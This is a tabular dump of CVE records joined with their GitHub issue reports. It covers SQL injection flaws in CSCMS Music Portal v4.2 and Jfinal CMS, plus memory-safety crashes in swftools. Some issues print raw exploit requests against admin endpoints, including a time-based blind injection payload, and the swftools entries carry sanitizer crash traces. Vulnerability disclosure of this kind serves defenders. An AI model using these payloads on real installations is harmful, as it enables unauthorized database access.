CVE-2022-29661 | 2022-05-26T14:15:08.310 | CSCMS Music Portal System v4.2 was discovered to contain a blind SQL injection vulnerability via the id parameter at /admin.php/pic/admin/type/save. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTI... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/chshcms/cscms/issues/21#issue-1207638326"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:chshcms:cscms_music_portal_system:4.2:*:*:*:*:*:*:*",
"matchCriteriaId": "4A0D50C4-3CEE-493B-86F5-8F55E1000F68",
"versionEndExcluding": null,
"versionEndIncluding": null,
"ve... | https://github.com/chshcms/cscms/issues/21#issue-1207638326 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"chshcms",
"cscms"
] | #### Details
There is a SQL blind injection vulnerability in pic_Type.php_del
Add an album after the administrator logs in

```
POST /admin.php/pic/admin/type/save HTTP/1.1
Host: cscms.test
Con... | SQL injection vulnerability exists in Cscms music portal system v4.2 | https://api.github.com/repos/chshcms/cscms/issues/21/comments | 0 | 2022-04-19T02:28:00Z | 2022-04-19T02:28:00Z | https://github.com/chshcms/cscms/issues/21 | 1,207,638,326 | 21 |
CVE-2022-29662 | 2022-05-26T14:15:08.350 | CSCMS Music Portal System v4.2 was discovered to contain a SQL injection vulnerability via the id parameter at /admin.php/news/admin/news/save. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTI... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/chshcms/cscms/issues/17#issue-1207624107"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:chshcms:cscms_music_portal_system:4.2:*:*:*:*:*:*:*",
"matchCriteriaId": "4A0D50C4-3CEE-493B-86F5-8F55E1000F68",
"versionEndExcluding": null,
"versionEndIncluding": null,
"ve... | https://github.com/chshcms/cscms/issues/17#issue-1207624107 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"chshcms",
"cscms"
] | #### Details
SQL injection vulnerability exists in Cscms music portal system v4.2 (news_News.php_del)
Administrators need to add another news after logging in.the following data package is constructed

Then delete the album,When restoring the album in the recycle bin, constru... | SQL injection vulnerability exists in Cscms music portal system v4.2 | https://api.github.com/repos/chshcms/cscms/issues/22/comments | 0 | 2022-04-19T02:34:04Z | 2022-04-19T02:34:04Z | https://github.com/chshcms/cscms/issues/22 | 1,207,641,519 | 22 |
CVE-2022-29664 | 2022-05-26T14:15:08.430 | CSCMS Music Portal System v4.2 was discovered to contain a SQL injection vulnerability via the id parameter at /admin.php/pic/admin/type/pl_save. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTI... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/chshcms/cscms/issues/23#issue-1207644525"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:chshcms:cscms_music_portal_system:4.2:*:*:*:*:*:*:*",
"matchCriteriaId": "4A0D50C4-3CEE-493B-86F5-8F55E1000F68",
"versionEndExcluding": null,
"versionEndIncluding": null,
"ve... | https://github.com/chshcms/cscms/issues/23#issue-1207644525 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"chshcms",
"cscms"
] | #### Details
There is a SQL blind injection vulnerability in pic_Type.php_pl_save
There is an injection when adding an album to save, and the injection point is ID
```
POST /admin.php/pic/admin/type/pl_save HTTP/1.1
Host: cscms.test
Content-Length: 38
Accept: application/json, text/javascript, */*; q=0.01
X... | SQL injection vulnerability exists in Cscms music portal system v4.2 | https://api.github.com/repos/chshcms/cscms/issues/23/comments | 0 | 2022-04-19T02:39:42Z | 2022-04-19T02:39:42Z | https://github.com/chshcms/cscms/issues/23 | 1,207,644,525 | 23 |
CVE-2022-29665 | 2022-05-26T14:15:08.477 | CSCMS Music Portal System v4.2 was discovered to contain a SQL injection vulnerability via the id parameter at /admin.php/news/admin/topic/save. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTI... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/chshcms/cscms/issues/19#issue-1207631855"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:chshcms:cscms_music_portal_system:4.2:*:*:*:*:*:*:*",
"matchCriteriaId": "4A0D50C4-3CEE-493B-86F5-8F55E1000F68",
"versionEndExcluding": null,
"versionEndIncluding": null,
"ve... | https://github.com/chshcms/cscms/issues/19#issue-1207631855 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"chshcms",
"cscms"
] | SQL injection vulnerability exists in Cscms music portal system v4.2 news_Topic.php_del
#### Details
Add a news topic after the administrator logs in

```
POST /admin.php/news/admin/topic/save HT... | SQL injection vulnerability exists in Cscms music portal system v4.2 | https://api.github.com/repos/chshcms/cscms/issues/19/comments | 0 | 2022-04-19T02:15:35Z | 2022-04-19T02:15:35Z | https://github.com/chshcms/cscms/issues/19 | 1,207,631,855 | 19 |
CVE-2022-29666 | 2022-05-26T14:15:08.523 | CSCMS Music Portal System v4.2 was discovered to contain a SQL injection vulnerability via the id parameter at /admin.php/pic/admin/lists/zhuan. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTI... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/chshcms/cscms/issues/24#issue-1207646618"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:chshcms:cscms_music_portal_system:4.2:*:*:*:*:*:*:*",
"matchCriteriaId": "4A0D50C4-3CEE-493B-86F5-8F55E1000F68",
"versionEndExcluding": null,
"versionEndIncluding": null,
"ve... | https://github.com/chshcms/cscms/issues/24#issue-1207646618 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"chshcms",
"cscms"
] | #### Details
There is a Injection vulnerability exists in pic_Lists.php_zhuan
The administrator needs to add a picture after logging in

construct payload
```
POST /admin.php/pic/admin/lists/zh... | SQL injection vulnerability exists in Cscms music portal system v4.2 | https://api.github.com/repos/chshcms/cscms/issues/24/comments | 0 | 2022-04-19T02:43:26Z | 2022-04-19T02:43:26Z | https://github.com/chshcms/cscms/issues/24 | 1,207,646,618 | 24 |
CVE-2022-29667 | 2022-05-26T14:15:08.563 | CSCMS Music Portal System v4.2 was discovered to contain a SQL injection vulnerability via /admin.php/pic/admin/pic/hy. This vulnerability is exploited via restoring deleted photos. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTI... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/chshcms/cscms/issues/26#issue-1207651726"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:chshcms:cscms_music_portal_system:4.2:*:*:*:*:*:*:*",
"matchCriteriaId": "4A0D50C4-3CEE-493B-86F5-8F55E1000F68",
"versionEndExcluding": null,
"versionEndIncluding": null,
"ve... | https://github.com/chshcms/cscms/issues/26#issue-1207651726 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"chshcms",
"cscms"
] | #### Details
there is a Injection vulnerability exists in pic_Pic.php_hy
Injection occurs when restoring deleted photos from the trash
```
GET /admin.php/pic/admin/pic/hy?id=3)and(sleep(5))--+ HTTP/1.1
Host: cscms.test
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows ... | SQL injection vulnerability exists in Cscms music portal system v4.2 | https://api.github.com/repos/chshcms/cscms/issues/26/comments | 0 | 2022-04-19T02:53:31Z | 2022-04-19T02:53:31Z | https://github.com/chshcms/cscms/issues/26 | 1,207,651,726 | 26 |
CVE-2022-29669 | 2022-05-26T14:15:08.607 | CSCMS Music Portal System v4.2 was discovered to contain a SQL injection vulnerability via the id parameter at /admin.php/news/admin/lists/zhuan. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTI... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/chshcms/cscms/issues/20#issue-1207634969"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:chshcms:cscms_music_portal_system:4.2:*:*:*:*:*:*:*",
"matchCriteriaId": "4A0D50C4-3CEE-493B-86F5-8F55E1000F68",
"versionEndExcluding": null,
"versionEndIncluding": null,
"ve... | https://github.com/chshcms/cscms/issues/20#issue-1207634969 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"chshcms",
"cscms"
] | #### Details
Injection vulnerability exists in news_Lists.php_zhuan
construct payload
```
POST /admin.php/news/admin/lists/zhuan HTTP/1.1
Host: cscms.test
Content-Length: 21
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0... | SQL injection vulnerability exists in Cscms music portal system v4.2 | https://api.github.com/repos/chshcms/cscms/issues/20/comments | 0 | 2022-04-19T02:21:42Z | 2022-04-19T02:21:42Z | https://github.com/chshcms/cscms/issues/20 | 1,207,634,969 | 20 |
CVE-2022-29680 | 2022-05-26T14:15:08.727 | CSCMS Music Portal System v4.2 was discovered to contain a blind SQL injection vulnerability via the id parameter at /admin.php/user/zu_del. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTI... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/chshcms/cscms/issues/31#issue-1209052957"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:chshcms:cscms_music_portal_system:4.2:*:*:*:*:*:*:*",
"matchCriteriaId": "4A0D50C4-3CEE-493B-86F5-8F55E1000F68",
"versionEndExcluding": null,
"versionEndIncluding": null,
"ve... | https://github.com/chshcms/cscms/issues/31#issue-1209052957 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"chshcms",
"cscms"
] | #### Details
there is a Injection vulnerability exists in sys_User.php_zu_del
The administrator needs to add a user to the member list after logging in. SQL injection vulnerability is generated when deleting the user. The constructed malicious payload is as follows

```
POST /admin.php/Label/page_del HTTP/1.1
Host: cscms.test
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 ... | SQL injection vulnerability exists in Cscms music portal system v4.2 | https://api.github.com/repos/chshcms/cscms/issues/34/comments | 0 | 2022-04-20T01:36:23Z | 2022-04-20T01:36:23Z | https://github.com/chshcms/cscms/issues/34 | 1,209,056,912 | 34 |
CVE-2022-29684 | 2022-05-26T14:15:08.887 | CSCMS Music Portal System v4.2 was discovered to contain a blind SQL injection vulnerability via the id parameter at /admin.php/Label/js_del. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTI... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/chshcms/cscms/issues/33#issue-1209055493"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:chshcms:cscms_music_portal_system:4.2:*:*:*:*:*:*:*",
"matchCriteriaId": "4A0D50C4-3CEE-493B-86F5-8F55E1000F68",
"versionEndExcluding": null,
"versionEndIncluding": null,
"ve... | https://github.com/chshcms/cscms/issues/33#issue-1209055493 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"chshcms",
"cscms"
] | #### Details
there is a Injection vulnerability exists in sys_Label.php_js_del

```
POST /admin.php/Label/js_del HTTP/1.1
Host: cscms.test
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Win... | SQL injection vulnerability exists in Cscms music portal system v4.2 | https://api.github.com/repos/chshcms/cscms/issues/33/comments | 0 | 2022-04-20T01:33:15Z | 2022-04-20T01:33:15Z | https://github.com/chshcms/cscms/issues/33 | 1,209,055,493 | 33 |
CVE-2022-29685 | 2022-05-26T14:15:08.927 | CSCMS Music Portal System v4.2 was discovered to contain a blind SQL injection vulnerability via the id parameter at /admin.php/User/level_sort. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTI... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/chshcms/cscms/issues/32#issue-1209054307"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:chshcms:cscms_music_portal_system:4.2:*:*:*:*:*:*:*",
"matchCriteriaId": "4A0D50C4-3CEE-493B-86F5-8F55E1000F68",
"versionEndExcluding": null,
"versionEndIncluding": null,
"ve... | https://github.com/chshcms/cscms/issues/32#issue-1209054307 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"chshcms",
"cscms"
] | #### Details
there is a Injection vulnerability exists in sys_User.php_level_sort
```
POST /admin.php/User/level_sort HTTP/1.1
Host: cscms.test
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: t... | SQL injection vulnerability exists in Cscms music portal system v4.2 | https://api.github.com/repos/chshcms/cscms/issues/32/comments | 0 | 2022-04-20T01:30:48Z | 2022-04-20T01:30:48Z | https://github.com/chshcms/cscms/issues/32 | 1,209,054,307 | 32 |
CVE-2022-29686 | 2022-05-26T14:15:08.963 | CSCMS Music Portal System v4.2 was discovered to contain a blind SQL injection vulnerability via the id parameter at /admin.php/singer/admin/lists/zhuan. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTI... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/chshcms/cscms/issues/29#issue-1209046027"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:chshcms:cscms_music_portal_system:4.2:*:*:*:*:*:*:*",
"matchCriteriaId": "4A0D50C4-3CEE-493B-86F5-8F55E1000F68",
"versionEndExcluding": null,
"versionEndIncluding": null,
"ve... | https://github.com/chshcms/cscms/issues/29#issue-1209046027 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"chshcms",
"cscms"
] | #### Details
there is a Injection vulnerability exists in singer_Lists.php_zhuan
After logging in, the administrator needs to add a singer first. SQL injection vulnerability is generated when adding singers. The constructed malicious payload is as follows
```
POST /admin.php/singer/admin/lists/zhuan HTTP/1.1
... | SQL injection vulnerability exists in Cscms music portal system v4.2 | https://api.github.com/repos/chshcms/cscms/issues/29/comments | 0 | 2022-04-20T01:14:41Z | 2022-04-20T01:16:52Z | https://github.com/chshcms/cscms/issues/29 | 1,209,046,027 | 29 |
CVE-2022-29687 | 2022-05-26T14:15:09.000 | CSCMS Music Portal System v4.2 was discovered to contain a blind SQL injection vulnerability via the id parameter at /admin.php/user/level_del. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTI... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/chshcms/cscms/issues/30#issue-1209049714"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:chshcms:cscms_music_portal_system:4.2:*:*:*:*:*:*:*",
"matchCriteriaId": "4A0D50C4-3CEE-493B-86F5-8F55E1000F68",
"versionEndExcluding": null,
"versionEndIncluding": null,
"ve... | https://github.com/chshcms/cscms/issues/30#issue-1209049714 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"chshcms",
"cscms"
] | #### Details
there is a Injection vulnerability exists in sys_User.php_level_del
The administrator needs to add a member after logging in. SQL injection vulnerability is generated when deleting the member. The constructed malicious payload is as follows
```
POST /admin.php/user/level_del HTTP/1.1
Host: cscms... | SQL injection vulnerability exists in Cscms music portal system v4.2 (Discovered by 星海Lab) | https://api.github.com/repos/chshcms/cscms/issues/30/comments | 0 | 2022-04-20T01:21:31Z | 2022-04-20T01:21:31Z | https://github.com/chshcms/cscms/issues/30 | 1,209,049,714 | 30 |
CVE-2022-29688 | 2022-05-26T14:15:09.037 | CSCMS Music Portal System v4.2 was discovered to contain a blind SQL injection vulnerability via the id parameter at /admin.php/singer/admin/singer/hy. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTI... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/chshcms/cscms/issues/27#issue-1209040138"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:chshcms:cscms_music_portal_system:4.2:*:*:*:*:*:*:*",
"matchCriteriaId": "4A0D50C4-3CEE-493B-86F5-8F55E1000F68",
"versionEndExcluding": null,
"versionEndIncluding": null,
"ve... | https://github.com/chshcms/cscms/issues/27#issue-1209040138 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"chshcms",
"cscms"
] | #### Details
There is a Injection vulnerability exists in singer_Singer.php_hy
After logging in, the administrator needs to add a singer and then delete the singer. When the singer is recycled from the recycle bin, SQL injection vulnerability is generated. The injection point is ID, and the constructed malicious ... | SQL injection vulnerability exists in Cscms music portal system v4.2 | https://api.github.com/repos/chshcms/cscms/issues/27/comments | 0 | 2022-04-20T01:08:46Z | 2022-04-20T01:09:36Z | https://github.com/chshcms/cscms/issues/27 | 1,209,040,138 | 27 |
CVE-2022-29689 | 2022-05-26T14:15:09.077 | CSCMS Music Portal System v4.2 was discovered to contain a blind SQL injection vulnerability via the id parameter at /admin.php/singer/admin/singer/del. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTI... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/chshcms/cscms/issues/28#issue-1209044410"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:chshcms:cscms_music_portal_system:4.2:*:*:*:*:*:*:*",
"matchCriteriaId": "4A0D50C4-3CEE-493B-86F5-8F55E1000F68",
"versionEndExcluding": null,
"versionEndIncluding": null,
"ve... | https://github.com/chshcms/cscms/issues/28#issue-1209044410 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"chshcms",
"cscms"
] | #### Details
there is a Injection vulnerability exists in singer_Singer.php_del
After logging in, the administrator needs to add a singer first and then delete the singer. When deleting the singer, SQL injection vulnerability is generated. The injection point is ID, and the constructed malicious payload is as fol... | SQL injection vulnerability exists in Cscms music portal system v4.2 | https://api.github.com/repos/chshcms/cscms/issues/28/comments | 0 | 2022-04-20T01:12:49Z | 2022-04-20T01:12:49Z | https://github.com/chshcms/cscms/issues/28 | 1,209,044,410 | 28 |
CVE-2022-30500 | 2022-05-26T16:15:08.727 | Jfinal cms 5.1.0 is vulnerable to SQL Injection. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/jflyfox/jfinal_cms/issues/35"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jflyfox:jfinal_cms:5.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "9B33E946-BD15-449C-B736-013773A64DF6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/jflyfox/jfinal_cms/issues/35 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"jflyfox",
"jfinal_cms"
] | There is a SQLI vul in background mode.The route is as following

vulnerable argument passing is as following
 located in swfdump.c. It allows an attacker to cause code Execution. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/matthiaskramm/swftools/issues/174"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*",
"matchCriteriaId": "903C4729-89F8-4583-AEFA-C1883FE61F59",
"versionEndExcluding": null,
"versionEndIncluding": "2020-12-22",
"versionStart... | https://github.com/matthiaskramm/swftools/issues/174 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"matthiaskramm",
"swftools"
] | ### system info
Ubuntu x86_64, clang 6.0, swfdump (latest master a9d5082)
### Command line
./src/swfdump -D @@
### AddressSanitizer output
==44192==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60600000e8d3 at pc 0x000000410aca bp 0x7fffffffdee0 sp 0x7fffffffded0
READ of size 1 at 0x60600000e8d3 ... | heap-buffer-overflow exists in the function handleEditText in swfdump.c | https://api.github.com/repos/swftools/swftools/issues/174/comments | 0 | 2021-10-07T13:17:16Z | 2021-10-07T13:17:16Z | https://github.com/swftools/swftools/issues/174 | 1,020,034,970 | 174 |
CVE-2021-42196 | 2022-06-02T14:15:29.777 | An issue was discovered in swftools through 20201222. A NULL pointer dereference exists in the function traits_parse() located in abc.c. It allows an attacker to cause Denial of Service. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/matthiaskramm/swftools/issues/172"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*",
"matchCriteriaId": "903C4729-89F8-4583-AEFA-C1883FE61F59",
"versionEndExcluding": null,
"versionEndIncluding": "2020-12-22",
"versionStart... | https://github.com/matthiaskramm/swftools/issues/172 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"matthiaskramm",
"swftools"
] | ### system info
Ubuntu x86_64, clang 6.0, swfdump (latest master a9d5082)
### Command line
./src/swfdump -D @@
### AddressSanitizer output
==47344==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000030 (pc 0x000000488d17 bp 0x000000000000 sp 0x7fffffffdd20 T0)
#0 0x488d16 in traits_parse as3/abc... | A NULL pointer dereference exists in the function traits_parse in abc.c | https://api.github.com/repos/swftools/swftools/issues/172/comments | 0 | 2021-10-07T13:11:09Z | 2021-10-07T13:11:09Z | https://github.com/swftools/swftools/issues/172 | 1,020,028,404 | 172 |
CVE-2021-42197 | 2022-06-02T14:15:29.817 | An issue was discovered in swftools through 20201222 through a memory leak in the swftools when swfdump is used. It allows an attacker to cause code execution. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/matthiaskramm/swftools/issues/177"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*",
"matchCriteriaId": "903C4729-89F8-4583-AEFA-C1883FE61F59",
"versionEndExcluding": null,
"versionEndIncluding": "2020-12-22",
"versionStart... | https://github.com/matthiaskramm/swftools/issues/177 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"matthiaskramm",
"swftools"
] | ### system info
Ubuntu x86_64, clang 6.0, swfdump (latest master a9d5082)
### Command line
./src/swfdump -D @@
### AddressSanitizer output
==43305==ERROR: LeakSanitizer: detected memory leaks
Indirect leak of 63245 byte(s) in 2 object(s) allocated from:
#0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linu... | memory leaks in swftools when we use swfdump | https://api.github.com/repos/swftools/swftools/issues/177/comments | 0 | 2021-10-07T13:25:36Z | 2021-10-07T13:25:36Z | https://github.com/swftools/swftools/issues/177 | 1,020,044,016 | 177 |
CVE-2021-42198 | 2022-06-02T14:15:29.860 | An issue was discovered in swftools through 20201222. A NULL pointer dereference exists in the function swf_GetBits() located in rfxswf.c. It allows an attacker to cause Denial of Service. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/matthiaskramm/swftools/issues/168"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*",
"matchCriteriaId": "903C4729-89F8-4583-AEFA-C1883FE61F59",
"versionEndExcluding": null,
"versionEndIncluding": "2020-12-22",
"versionStart... | https://github.com/matthiaskramm/swftools/issues/168 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"matthiaskramm",
"swftools"
] | ### system info
Ubuntu x86_64, clang 6.0, swfdump (latest master a9d5082)
### Command line
./src/swfdump -D @@
### AddressSanitizer output
==41593==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000471fac bp 0x0ffffed896e0 sp 0x7fffffffdd30 T0)
#0 0x471fab in swf_GetBits /test/sw... | A NULL pointer dereference exists in the function swf_GetBits in rfxswf.c | https://api.github.com/repos/swftools/swftools/issues/168/comments | 0 | 2021-10-07T12:57:51Z | 2021-10-07T12:58:43Z | https://github.com/swftools/swftools/issues/168 | 1,020,014,352 | 168 |
CVE-2021-42199 | 2022-06-02T14:15:29.900 | An issue was discovered in swftools through 20201222. A heap buffer overflow exists in the function swf_FontExtract_DefineTextCallback() located in swftext.c. It allows an attacker to cause code execution. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
